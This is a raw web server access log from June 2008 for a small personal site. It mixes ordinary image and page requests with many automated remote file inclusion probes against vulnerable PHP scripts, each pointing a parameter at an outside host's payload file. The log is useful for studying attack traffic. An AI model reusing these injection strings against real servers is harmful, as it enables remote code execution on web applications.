133.9.4.11 - - [24/Jun/2008:21:24:04 -0500] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:04 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:04 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:05 -0500] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:05 -0500] "GET /costume/costm8.jpg HTTP/1.1" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:05 -0500] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:05 -0500] "GET /costume/costm9.jpg HTTP/1.1" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:05 -0500] "GET /costume/costm11.jpg HTTP/1.1" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:05 -0500] "GET /costume/costm12.jpg HTTP/1.1" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:06 -0500] "GET /costume/costm10.jpg HTTP/1.1" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:06 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:07 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:29 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:29 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:30 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3346 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:30 -0500] "GET /costume/costm13.jpg HTTP/1.1" 200 10011 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:30 -0500] "GET /costume/costm14.jpg HTTP/1.1" 200 10586 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:31 -0500] "GET /costume/costm16.jpg HTTP/1.1" 200 9075 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:31 -0500] "GET /costume/costm15.jpg HTTP/1.1" 200 9724 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:31 -0500] "GET /costume/costm18.jpg HTTP/1.1" 200 9364 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:31 -0500] "GET /costume/costm17.jpg HTTP/1.1" 200 9825 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:31 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:31 -0500] "GET /costume/costm19.jpg HTTP/1.1" 200 10555 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:31 -0500] "GET /costume/costm20.jpg HTTP/1.1" 200 57110 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:31 -0500] "GET /costume/costm22.jpg HTTP/1.1" 200 9434 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:31 -0500] "GET /costume/costm21.jpg HTTP/1.1" 200 9439 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:31 -0500] "GET /costume/costm23.jpg HTTP/1.1" 200 9858 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:31 -0500] "GET /costume/costm24.jpg HTTP/1.1" 200 9990 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:32 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:37 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:40 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:41 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:41 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
213.214.0.132 - - [24/Jun/2008:21:24:50 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
213.214.0.132 - - [24/Jun/2008:21:24:51 -0500] "GET //skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
133.9.4.11 - - [24/Jun/2008:21:24:52 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:52 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:54 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:54 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:55 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:55 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
89.108.67.119 - - [24/Jun/2008:21:26:33 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bedrijfsreklame.com//templates/js_lush_004/readme.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
89.108.67.119 - - [24/Jun/2008:21:26:33 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bedrijfsreklame.com//templates/js_lush_004/readme.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.230.1.10 - - [24/Jun/2008:21:27:28 -0500] "GET //?pag=http://nightbaron.com/poll/templates/admin/a.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.76"
87.230.1.10 - - [24/Jun/2008:21:27:28 -0500] "GET /logs//?pag=http://nightbaron.com/poll/templates/admin/a.txt??? HTTP/1.1" 200 88841 "-""libwww-perl/5.76"
65.55.208.131 - - [24/Jun/2008:21:28:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [24/Jun/2008:21:28:53 -0500] "GET /costume/costume1.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [24/Jun/2008:21:30:50 -0500] "GET /logs/access_log.1157846400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
217.167.194.105 - - [24/Jun/2008:21:33:45 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
217.167.194.105 - - [24/Jun/2008:21:33:51 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
208.98.1.12 - - [24/Jun/2008:21:34:49 -0500] "GET /logs/access_log.1207785600///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
208.98.1.12 - - [24/Jun/2008:21:34:50 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
208.98.1.12 - - [24/Jun/2008:21:34:50 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
213.214.0.132 - - [24/Jun/2008:21:35:34 -0500] "GET /logs//?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 200 88841 "-""libwww-perl/5.803"
213.214.0.132 - - [24/Jun/2008:21:35:34 -0500] "GET //?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
85.25.86.64 - - [24/Jun/2008:21:37:26 -0500] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xdedzx.com/xdedzx/id2.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
85.25.86.64 - - [24/Jun/2008:21:37:26 -0500] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xdedzx.com/xdedzx/id2.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
209.90.77.34 - - [24/Jun/2008:21:40:07 -0500] "GET /logs/access_log.1194048000/index.php?go=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
209.90.77.34 - - [24/Jun/2008:21:40:07 -0500] "GET /index.php?go=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
209.90.77.34 - - [24/Jun/2008:21:40:07 -0500] "GET /logs/index.php?go=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
209.90.77.34 - - [24/Jun/2008:21:40:48 -0500] "GET /logs/access_log.1182038400/index.php?go=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
200.203.245.7 - - [24/Jun/2008:21:42:02 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
200.203.245.7 - - [24/Jun/2008:21:42:03 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
77.221.157.210 - - [24/Jun/2008:21:43:04 -0500] "GET /logs/access_log.1207785600///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
77.221.157.210 - - [24/Jun/2008:21:43:04 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
77.221.157.210 - - [24/Jun/2008:21:43:05 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
202.53.78.212 - - [24/Jun/2008:21:45:25 -0500] "GET /logs/access_log.1207785600%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1207785600%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1207785600&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3ESlurp;%20http:/help.yahoo.com/help/us/ysearch/slurp)%22%2074.6.7.151%20-%20-%20[09/Apr/2008:%20...%20wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http:%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1207785600%3C/span%3E%20-%20%3Cem%3E209k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r83%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu95pomFImX0A.RxXNyoA;_ylu=X3oDMTB0NzFmM3FxBHNlYwNzcgRwb3MDOTgzBGNvbG8DYWMyBHZ0aWQD/SIG=11hvuua8f/EXP=1214444521/**http%3a/hiperlink.com.pl/hoepl///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 469 "-""libwww-perl/5.79"
202.53.78.212 - - [24/Jun/2008:21:45:26 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
202.53.78.212 - - [24/Jun/2008:21:45:26 -0500] "GET /logs/access_log.1207785600%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1207785600%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1207785600&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3ESlurp;%20http:/help.yahoo.com/help/us/ysearch/slurp)%22%2074.6.7.151%20-%20-%20[09/Apr/2008:%20...%20wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http:%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1207785600%3C/span%3E%20-%20%3Cem%3E209k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r83%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu95pomFImX0A.RxXNyoA;_ylu=X3oDMTB0NzFmM3FxBHNlYwNzcgRwb3MDOTgzBGNvbG8DYWMyBHZ0aWQD/SIG=11hvuua8f/EXP=1214444521/**http%3a/hiperlink.com.pl///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 469 "-""libwww-perl/5.79"
62.205.161.238 - - [24/Jun/2008:21:46:52 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
62.205.161.238 - - [24/Jun/2008:21:46:57 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
200.168.76.155 - - [24/Jun/2008:21:47:02 -0500] "GET /logs/access_log.1207785600/index1.php?=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
200.168.76.155 - - [24/Jun/2008:21:47:03 -0500] "GET /index1.php?=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
200.168.76.155 - - [24/Jun/2008:21:47:03 -0500] "GET /logs/index1.php?=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
193.194.84.215 - - [24/Jun/2008:21:47:20 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
193.194.84.215 - - [24/Jun/2008:21:47:26 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
85.25.86.64 - - [24/Jun/2008:21:47:34 -0500] "GET /logs/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://xdedzx.com/xdedzx/id2.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
85.25.86.64 - - [24/Jun/2008:21:47:35 -0500] "GET /modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://xdedzx.com/xdedzx/id2.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
193.194.84.215 - - [24/Jun/2008:21:47:50 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
193.194.84.215 - - [24/Jun/2008:21:47:56 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
200.203.245.7 - - [24/Jun/2008:21:53:56 -0500] "GET /logs//com_facileforms/facileforms.frame.php?ff_compath=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
200.203.245.7 - - [24/Jun/2008:21:53:56 -0500] "GET //com_facileforms/facileforms.frame.php?ff_compath=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
200.168.76.155 - - [24/Jun/2008:21:56:36 -0500] "GET /logs/access_log.1207785600/modules/My_eGallery/index.php?basepath=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.808"
200.168.76.155 - - [24/Jun/2008:21:56:36 -0500] "GET /modules/My_eGallery/index.php?basepath=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
200.168.76.155 - - [24/Jun/2008:21:56:37 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
200.168.76.155 - - [24/Jun/2008:21:57:11 -0500] "GET /logs/access_log.1186358400/index1.php?=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
200.11.67.242 - - [24/Jun/2008:21:58:20 -0500] "GET /logs/access_log.1207785600///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
200.11.67.242 - - [24/Jun/2008:21:58:20 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
200.11.67.242 - - [24/Jun/2008:21:58:20 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
85.13.194.178 - - [24/Jun/2008:21:58:41 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
85.13.194.178 - - [24/Jun/2008:21:58:41 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
202.43.35.133 - - [24/Jun/2008:21:59:05 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://redsraiders.com/forum/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
202.43.35.133 - - [24/Jun/2008:21:59:05 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://redsraiders.com/forum/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
219.93.96.46 - - [24/Jun/2008:21:59:10 -0500] "GET /logs/access_log.1207785600%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1207785600%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1207785600&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3ESlurp;%20http:/help.yahoo.com/help/us/ysearch/slurp)%22%2074.6.7.151%20-%20-%20[09/Apr/2008:%20...%20wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http:%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1207785600%3C/span%3E%20-%20%3Cem%3E209k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r76%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0oGkj.eomFI.t4ArptXNyoA;_ylu=X3oDMTB0MjNvaXN0BHNlYwNzcgRwb3MDOTc2BGNvbG8Dc2sxBHZ0aWQD/SIG=11h3v9a2l/EXP=1214444574/**http%3a/hiperlink.com.pl/hoepl///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 469 "-""libwww-perl/5.79"
219.93.96.46 - - [24/Jun/2008:21:59:11 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
